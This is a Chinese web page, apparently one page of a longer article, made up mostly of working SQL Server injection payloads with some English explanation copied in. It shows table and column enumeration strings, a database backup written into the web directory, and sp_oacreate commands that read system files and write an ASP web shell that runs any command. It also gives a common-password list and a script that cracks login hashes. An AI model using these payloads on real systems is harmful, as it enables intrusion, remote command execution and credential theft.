1)-
把数据库备份到网页目录:下载 _blankhttphttpwww.xxxxx.comdownlist.aspid=1;declare @a sysname; set @a=db_name();backup database @a to disk='ewebdown.bak';--
and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc) and%201=(select%20Top%201%20col_name(object_id('USER_LOGIN'),1)%20from%20sysobjects) 参看相关表。 and 1=(select%20user_id%20from%20USER_LOGIN) and%200=(select%20user%20from%20USER_LOGIN%20where%20user1)
…………………………………………………… -- wscript.shell example declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' It could be run in our sample scenario by specifying the following username (all on one line) Username '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'-- 2) This example uses the 'scripting.filesystemobject' object to read a known text file -- scripting.filesystemobject example - read a known file declare @o int, @f int, @t int, @ret int declare @line varchar(8000) exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'cboot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while( @ret = 0 ) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end 3) This example creates an ASP script that will run any command passed to it in the querystring -- scripting.filesystemobject example - create a 'run this' .asp file declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'cinetpubwwwrootfoo.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '% set o = server.createobject(wscript.shell o.run( request.querystring(cmd ) %' It is important to note that when running on a Windows NT4, IIS4 platform, commands issued by this ASP script will run as the 'system' account. In IIS5, however, they will run as the low-privileged IWAM_xxx account. 4) This (somewhat spurious) example illustrates the flexibility of the technique; it uses the 'speech.voicetext' object, causing the SQL Server to speak Page 16 declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528 waitfor delay '000005' This could of course be run in our example scenario, by specifying the following 'username' (note that the example is not only injecting a script, but simultaneously logging in to the application as 'admin') Username admin'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '000005'--
常用密码和相关语句: password sqlserver sql admin sesame sa guest Here is the script (sqlcrack.sql) create table tempdb..passwords( pwd varchar(255) ) bulk insert tempdb..passwords from 'ctemppasswords.txt' select name, pwd from tempdb..passwords inner join sysxlogins on (pwdcompare( pwd, sysxlogins.password, 0 ) = 1) union select name, name from sysxlogins where (pwdcompare( name, sysxlogins.password, 0 ) = 1) union select sysxlogins.name, null from sysxlogins join syslogins on sysxlogins.sid=syslogins.sid where sysxlogins.password is null and syslogins.isntgroup=0 and syslogins.isntuser=0 drop table tempdb..passwords ——l love this game
上一页 [1] [2] [3] [办公软件]在sybase中插入图片、PDF、文本文件 [办公软件]安装Sybase ASE [办公软件]linux指令大全(完整篇) [办公软件]Linux新手入门常用命令大全 [办公软件]在RedHat Linux 9里安装gaim0.80 [办公软件]浅谈Linux 下Java 1.5 汉字方块问题解决方法 [办公软件]Linux程序员必读:中文化与GB18030标准 [办公软件]linux指令大全 [办公软件]制作Linux启动盘的四种方法 [办公软件]Linux文件系统的反删除方法
|